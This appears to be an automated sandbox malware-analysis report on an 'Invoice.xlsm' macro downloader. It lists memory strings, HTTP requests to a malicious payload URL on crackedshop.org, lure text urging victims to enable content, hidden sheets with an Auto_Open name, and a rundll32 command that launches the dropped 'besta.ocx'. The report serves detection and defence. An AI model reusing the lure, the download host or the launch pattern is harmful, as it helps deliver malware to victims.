    Source: EXCEL.EXE, 00000000.00000003.285059746.0000000012988000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884785145.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884975520.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.892309496.00000000129DB000.00000004.00000001.sdmpString found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices&
    Source: EXCEL.EXE, 00000000.00000003.285059746.0000000012988000.00000004.00000001.sdmpString found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devicesUserVoiceWordIOShttps://word.uservoice.com
    Source: EXCEL.EXE, 00000000.00000003.285059746.0000000012988000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884785145.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884975520.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.892309496.00000000129DB000.00000004.00000001.sdmp, 40484C98-D3A3-480D-91A7-412F4910F605.0.drString found in binary or memory: https://web.microsoftstream.com/video/
    Source: 40484C98-D3A3-480D-91A7-412F4910F605.0.drString found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
    Source: EXCEL.EXE, 00000000.00000003.285059746.0000000012988000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884785145.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884975520.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.892309496.00000000129DB000.00000004.00000001.sdmpString found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/pA~
    Source: EXCEL.EXE, 00000000.00000003.285059746.0000000012988000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884785145.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884975520.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.892309496.00000000129DB000.00000004.00000001.sdmp, 40484C98-D3A3-480D-91A7-412F4910F605.0.drString found in binary or memory: https://webshell.suite.office.com
    Source: EXCEL.EXE, 00000000.00000003.885712225.0000000012988000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884722531.0000000012988000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.892258476.000000001299A000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.887073698.0000000012999000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.886458219.0000000012988000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.886938116.0000000012988000.00000004.00000001.sdmpString found in binary or memory: https://word.uservoice.com/forums/304948-word#
    Source: EXCEL.EXE, 00000000.00000003.285059746.0000000012988000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884785145.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884975520.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.892309496.00000000129DB000.00000004.00000001.sdmp, 40484C98-D3A3-480D-91A7-412F4910F605.0.drString found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
    Source: EXCEL.EXE, 00000000.00000003.285059746.0000000012988000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884785145.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884975520.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.892309496.00000000129DB000.00000004.00000001.sdmp, 40484C98-D3A3-480D-91A7-412F4910F605.0.drString found in binary or memory: https://wus2.contentsync.
    Source: EXCEL.EXE, 00000000.00000003.886777614.0000000012920000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.285059746.0000000012988000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.892135449.0000000012920000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.285010208.0000000012920000.00000004.00000001.sdmp, 40484C98-D3A3-480D-91A7-412F4910F605.0.drString found in binary or memory: https://wus2.pagecontentsync.
    Source: 40484C98-D3A3-480D-91A7-412F4910F605.0.drString found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
    Source: EXCEL.EXE, 00000000.00000003.884392576.000000001274F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885121120.000000001274F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.891675623.000000001274F000.00000004.00000001.sdmpString found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2k
    Source: 40484C98-D3A3-480D-91A7-412F4910F605.0.drString found in binary or memory: https://www.odwebp.svc.ms
    Source: EXCEL.EXE, 00000000.00000003.285059746.0000000012988000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884785145.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884975520.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.892309496.00000000129DB000.00000004.00000001.sdmpString found in binary or memory: https://www.odwebp.svc.msmhC
    Source: unknownDNS traffic detected: queries for: ascarya.digital
    Source: global trafficHTTP traffic detected: GET /9/q080U0ARYYL/ HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: crackedshop.orgConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /cgi-sys/suspendedpage.cgi HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: crackedshop.orgConnection: Keep-Alive

    System Summary:

    barindex
    Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
    Source: Screenshot number: 8Screenshot OCR: ENABLE EDITING" FROM YELLOW BAR ABOVE 5 Once you have enabled editing, please click "Enable Conte
    Source: Screenshot number: 8Screenshot OCR: protected documents. r 3 .0 4 CLICK "ENABLE EDITING" FROM YELLOW BAR ABOVE 5 Once you have ena
    Source: Screenshot number: 8Screenshot OCR: Enable Content" button 6 * mm 7 I 8 9 " 10 11 12 13_ _ Q ;;tosort office can t find your li
    Source: Invoice.xlsmMacro extractor: Sheet name: Buk2
    Source: Invoice.xlsmMacro extractor: Sheet name: Buk5
    Source: Invoice.xlsmMacro extractor: Sheet name: Buk1
    Source: Invoice.xlsmMacro extractor: Sheet name: Buk7
    Source: Invoice.xlsmMacro extractor: Sheet name: EFEWF
    Source: Invoice.xlsmMacro extractor: Sheet name: Buk3
    Source: Invoice.xlsmMacro extractor: Sheet name: Buk4
    Source: Invoice.xlsmMacro extractor: Sheet name: Buk6
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXECode function: 0_3_1282970F0_3_1282970F
    Source: workbook.xmlBinary string: \Desktop\Fil\1d\Cir\" xmlns:x15ac="http://schemas.microsoft.com/office/spreadsheetml/2010/11/ac"/></mc:Choice></mc:AlternateContent><xr:revisionPtr revIDLastSave="0" documentId="13_ncr:1_{1D31CE62-AFF1-46C8-8AB3-51A0A09BC8BF}" xr6:coauthVersionLast="45" xr6:coauthVersionMax="45" xr10:uidLastSave="{00000000-0000-0000-0000-000000000000}"/><bookViews><workbookView xWindow="-120" yWindow="-120" windowWidth="20730" windowHeight="11160" xr2:uid="{00000000-000D-0000-FFFF-FFFF00000000}"/></bookViews><sheets><sheet name="Sheet" sheetId="1" r:id="rId1"/><sheet name="Ss1" sheetId="2" state="hidden" r:id="rId2"/><sheet name="Ss1br2" sheetId="3" state="hidden" r:id="rId3"/><sheet name="Ssbr3" sheetId="4" state="hidden" r:id="rId4"/><sheet name="EFEWF" sheetId="5" state="hidden" r:id="rId5"/><sheet name="Buk1" sheetId="6" state="hidden" r:id="rId6"/><sheet name="Buk2" sheetId="7" state="hidden" r:id="rId7"/><sheet name="Buk3" sheetId="8" state="hidden" r:id="rId8"/><sheet name="Buk4" sheetId="9" state="hidden" r:id="rId9"/><sheet name="Buk5" sheetId="10" state="hidden" r:id="rId10"/><sheet name="Buk6" sheetId="11" state="hidden" r:id="rId11"/><sheet name="Buk7" sheetId="12" state="hidden" r:id="rId12"/></sheets><definedNames><definedName name="LKLW">EFEWF!$D$3</definedName><definedName name="SASA">EFEWF!$D$17</definedName><definedName name="SASA1">EFEWF!$D$19</definedName><definedName name="SASA2">EFEWF!$D$21</definedName><definedName name="_xlnm.Auto_Open">EFEWF!$D$1</definedName></definedNames><calcPr calcId="191029"/><extLst><ext uri="{B58B0392-4F1F-4190-BB64-5DF3571DCE5F}" xmlns:xcalcf="http://schemas.microsoft.com/office/spreadsheetml/2018/calcfeatures"><xcalcf:calcFeatures><xcalcf:feature name="microsoft.com:RD"/><xcalcf:feature name="microsoft.com:FV"/></xcalcf:calcFeatures></ext></extLst></workbook>
    Source: Invoice.xlsmVirustotal: Detection: 28%
    Source: Invoice.xlsmReversingLabs: Detection: 20%
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWow64\rundll32.exe ..\besta.ocx,44532.2997003472
    Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE "C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE" /automation -Embedding
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWow64\rundll32.exe ..\besta.ocx,44532.2997003472
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWow64\rundll32.exe ..\besta.ocx,44532.2997003472Jump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCacheJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\{D6239669-CD33-4FE0-8FA1-A794E7A44C05} - OProcSessId.datJump to behavior
    Source: EXCEL.EXEString found in binary or memory: " o:authentication="2"> <o:url>https://addinslicensing.store.office.com/entitlement/query</o:url> <o:ticket o:policy="MBI_SSL_SHORT" o:i/
    Source: EXCEL.EXEString found in binary or memory: </o:service> <o:service o:name="CommerceQuery15"> <o:url>https://addinslicensing.store.office.com/commerce/query</o:url> </o:servic.
    Source: EXCEL.EXEString found in binary or memory: </o:service> <o:service o:name="AppAcquisitionLogging"> <o:url>https://addinsinstallation.store.office.com/app/acquisitionlogging</o:;
    Source: classification engineClassification label: mal76.expl.winXLSM@3/5@2/2
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEAutomated click: OK
    Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: Invoice.xlsmInitial sample: OLE zip file path = xl/worksheets/sheet4.xml
    Source: Invoice.xlsmInitial sample: OLE zip file path = xl/media/image1.png
    Source: Invoice.xlsmInitial sample: OLE zip file path = xl/worksheets/_rels/sheet2.xml.rels
    Source: Invoice.xlsmInitial sample: OLE zip file path = xl/worksheets/_rels/sheet3.xml.rels
    Source: Invoice.xlsmInitial sample: OLE zip file path = xl/printerSettings/printerSettings2.bin
    Source: Invoice.xlsmInitial sample: OLE zip file path = xl/printerSettings/printerSettings3.bin
    Source: Invoice.xlsmInitial sample: OLE zip file path = xl/calcChain.xml
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguagesJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dllJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: EXCEL.EXE, 00000000.00000002.889143323.000000000D1D5000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAWX
    Source: EXCEL.EXE, 00000000.00000003.285010208.0000000012920000.00000004.00000001.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\m
    Source: EXCEL.EXE, 00000000.00000002.890397061.000000000EEE0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.890478896.000000000EF42000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW
    Source: Yara matchFile source: app.xml, type: SAMPLE

    Mitre Att&ck Matrix

    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
    Valid AccountsCommand and Scripting Interpreter2Path InterceptionProcess Injection1Masquerading1OS Credential DumpingSecurity Software Discovery1Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel12Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
    Default AccountsScripting1Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsDisable or Modify Tools1LSASS MemoryFile and Directory Discovery1Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothIngress Tool Transfer1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
    Domain AccountsExploitation for Client Execution23Logon Script (Windows)Logon Script (Windows)Process Injection1Security Account ManagerSystem Information Discovery2SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
    Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Scripting1NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol13SIM Card SwapCarrier Billing Fraud
    Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptRundll321LSA SecretsRemote System DiscoverySSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings

    Behavior Graph

    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet

    Screenshots

    Thumbnails

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.

    windows-stand

    Antivirus, Machine Learning and Genetic Malware Detection

    Initial Sample

    SourceDetectionScannerLabelLink
    Invoice.xlsm29%VirustotalBrowse
    Invoice.xlsm20%ReversingLabsDocument-Office.Downloader.EncDoc

    Dropped Files

    No Antivirus matches

    Unpacked PE Files

    No Antivirus matches

    Domains

    No Antivirus matches

    URLs

    SourceDetectionScannerLabelLink
    https://officesetup.getmicrosoftkey.com:U0%Avira URL Cloudsafe
    https://nam.learn0%Avira URL Cloudsafe
    https://shell.suite.office.com:1443fU0%Avira URL Cloudsafe
    https://cdn.entity.0%URL Reputationsafe
    https://ascarya.digital/wp-con0%Avira URL Cloudsafe
    https://autodiscover-s.o0%Avira URL Cloudsafe
    https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
    https://dataservice.o365filtering.comZ60%Avira URL Cloudsafe
    https://api.aadrm.com/0%URL Reputationsafe
    https://substrate.office.com7A0%Avira URL Cloudsafe
    https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
    https://ascarya.digital/wp-c0%Avira URL Cloudsafe
    https://officeci.azurewebsites.net/api/0%URL Reputationsafe
    https://www.odwebp.svc.msmhC0%Avira URL Cloudsafe
    https://store.office.cn/addinstemplate0%URL Reputationsafe
    https://ascarya.digit0%Avira URL Cloudsafe
    https://www.odwebp.svc.ms0%URL Reputationsafe
    https://ascarya.digital/wp-conte0%Avira URL Cloudsafe
    https://api.addins.store.officeppe.com/addinstemplate0%URL Reputationsafe
    https://api.diagnostics.office.com_U0%Avira URL Cloudsafe
    https://ascarya.digital/w0%Avira URL Cloudsafe
    https://ncus.contentsync.0%URL Reputationsafe
    https://ascarya.digital0%Avira URL Cloudsafe
    https://substrate.office.comP0%Avira URL Cloudsafe
    https://dataservice.o365filterin0%Avira URL Cloudsafe
    https://outlook.office.comSharepointFilesHostFormat0%Avira URL Cloudsafe
    https://devnull.onenote.comMBI_SSL_SHORT0%Avira URL Cloudsafe
    https://wus2.contentsync.0%URL Reputationsafe
    http://crackedshop.org/9/q080U0ARYYL/100%Avira URL Cloudmalware
    https://ascarya.digital/wp-content%https://ascarya.digital/wp-content/ZH&https://ascarya.digital/wp-0%Avira URL Cloudsafe
    https://dataservice.o3650%Avira URL Cloudsafe

    Domains and IPs

    Contacted Domains

    NameIPActiveMaliciousAntivirus DetectionReputation
    crackedshop.org
    		94.102.59.39
    		truefalse
      		unknown
      ascarya.digital
      		67.207.81.73
      		truefalse
        		unknown

        Contacted URLs

        NameMaliciousAntivirus DetectionReputation
        http://crackedshop.org/9/q080U0ARYYL/true
        • Avira URL Cloud: malware
        		unknown

        URLs from Memory and Binaries

        NameSourceMaliciousAntivirus DetectionReputation
        https://officesetup.getmicrosoftkey.com:UEXCEL.EXE, 00000000.00000003.285059746.0000000012988000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884785145.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884975520.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.892309496.00000000129DB000.00000004.00000001.sdmpfalse
        • Avira URL Cloud: safe
        		low
        https://shell.suite.office.com:144340484C98-D3A3-480D-91A7-412F4910F605.0.drfalse
          		high
          https://nam.learnEXCEL.EXE, 00000000.00000003.885712225.0000000012988000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884722531.0000000012988000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.892258476.000000001299A000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.887073698.0000000012999000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.886458219.0000000012988000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.886938116.0000000012988000.00000004.00000001.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://autodiscover-s.outlook.com/EXCEL.EXE, EXCEL.EXE, 00000000.00000003.885275014.0000000012821000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.891911589.0000000012821000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885884780.0000000012845000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.890478896.000000000EF42000.00000004.00000001.sdmp, 40484C98-D3A3-480D-91A7-412F4910F605.0.drfalse
            		high
            https://shell.suite.office.com:1443fUEXCEL.EXE, 00000000.00000003.285059746.0000000012988000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884785145.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884975520.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.892309496.00000000129DB000.00000004.00000001.sdmpfalse
            • Avira URL Cloud: safe
            		low
            https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2kEXCEL.EXE, 00000000.00000003.884392576.000000001274F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885121120.000000001274F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.891675623.000000001274F000.00000004.00000001.sdmpfalse
              		high
              https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=FlickrEXCEL.EXE, 00000000.00000002.891599493.00000000126FA000.00000004.00000001.sdmp, 40484C98-D3A3-480D-91A7-412F4910F605.0.drfalse
                		high
                https://cdn.entity.40484C98-D3A3-480D-91A7-412F4910F605.0.drfalse
                • URL Reputation: safe
                		unknown
                https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/EXCEL.EXE, 00000000.00000003.285059746.0000000012988000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884785145.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884975520.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.892309496.00000000129DB000.00000004.00000001.sdmp, 40484C98-D3A3-480D-91A7-412F4910F605.0.drfalse
                  		high
                  https://ascarya.digital/wp-conEXCEL.EXE, 00000000.00000002.892898226.0000000015187000.00000004.00000001.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://autodiscover-s.oEXCEL.EXEfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://outlook.office365.com/autodiscover/autodiscover.jsonvEXCEL.EXE, 00000000.00000003.285059746.0000000012988000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884785145.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884975520.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.892309496.00000000129DB000.00000004.00000001.sdmpfalse
                    		high
                    https://visio.uservoice.com/forums/368202-visio-on-devicesUserVoiceWordIOShttps://word.uservoice.comEXCEL.EXE, 00000000.00000003.285059746.0000000012988000.00000004.00000001.sdmpfalse
                      		high
                      https://rpsticket.partnerservices.getmicrosoftkey.comEXCEL.EXE, 00000000.00000003.884392576.000000001274F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885121120.000000001274F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.891675623.000000001274F000.00000004.00000001.sdmp, 40484C98-D3A3-480D-91A7-412F4910F605.0.drfalse
                      • URL Reputation: safe
                      		unknown
                      https://lookup.onenote.com/lookup/geolocation/v1EXCEL.EXE, 00000000.00000003.285059746.0000000012988000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884785145.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884975520.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.892309496.00000000129DB000.00000004.00000001.sdmp, 40484C98-D3A3-480D-91A7-412F4910F605.0.drfalse
                        		high
                        https://dataservice.o365filtering.comZ6EXCEL.EXE, 00000000.00000003.285059746.0000000012988000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884785145.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884975520.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.892309496.00000000129DB000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFileEXCEL.EXE, 00000000.00000003.285059746.0000000012988000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884785145.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884975520.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.892309496.00000000129DB000.00000004.00000001.sdmp, 40484C98-D3A3-480D-91A7-412F4910F605.0.drfalse
                          		high
                          https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy40484C98-D3A3-480D-91A7-412F4910F605.0.drfalse
                            		high
                            https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=FlickrMBI_SSL_SHORTssl.EXCEL.EXE, 00000000.00000003.284941605.00000000128BF000.00000004.00000001.sdmpfalse
                              		high
                              https://api.aadrm.com/EXCEL.EXE, 00000000.00000003.285059746.0000000012988000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884785145.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884975520.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.892309496.00000000129DB000.00000004.00000001.sdmp, 40484C98-D3A3-480D-91A7-412F4910F605.0.drfalse
                              • URL Reputation: safe
                              		unknown
                              https://store.office.de/addinstemplateDeepLinkingServiceChinahttps://store.office.cn/addinstemplateDEXCEL.EXE, 00000000.00000003.285059746.0000000012988000.00000004.00000001.sdmpfalse
                                		high
                                https://substrate.office.com7AEXCEL.EXE, 00000000.00000003.285059746.0000000012988000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884785145.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884975520.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.892309496.00000000129DB000.00000004.00000001.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies40484C98-D3A3-480D-91A7-412F4910F605.0.drfalse
                                  		high
                                  https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=ImmersiveAppEXCEL.EXE, 00000000.00000002.891872749.0000000012805000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885251853.0000000012805000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.891599493.00000000126FA000.00000004.00000001.sdmpfalse
                                    		high
                                    https://api.microsoftstream.com/api/40484C98-D3A3-480D-91A7-412F4910F605.0.drfalse
                                      		high
                                      https://insertmedia.bing.office.net/images/hosted?host=office&amp;adlt=strict&amp;hostType=Immersive40484C98-D3A3-480D-91A7-412F4910F605.0.drfalse
                                        		high
                                        https://cr.office.comEXCEL.EXE, 00000000.00000003.285059746.0000000012988000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884785145.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884975520.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.892309496.00000000129DB000.00000004.00000001.sdmp, 40484C98-D3A3-480D-91A7-412F4910F605.0.drfalse
                                          		high
                                          https://api.microsoftstream.com/api/GhEXCEL.EXE, 00000000.00000003.285059746.0000000012988000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884785145.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884975520.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.892309496.00000000129DB000.00000004.00000001.sdmpfalse
                                            		high
                                            https://res.getmicrosoftkey.com/api/redemptionevents40484C98-D3A3-480D-91A7-412F4910F605.0.drfalse
                                            • URL Reputation: safe
                                            		unknown
                                            https://ascarya.digital/wp-cEXCEL.EXE, 00000000.00000002.892898226.0000000015187000.00000004.00000001.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
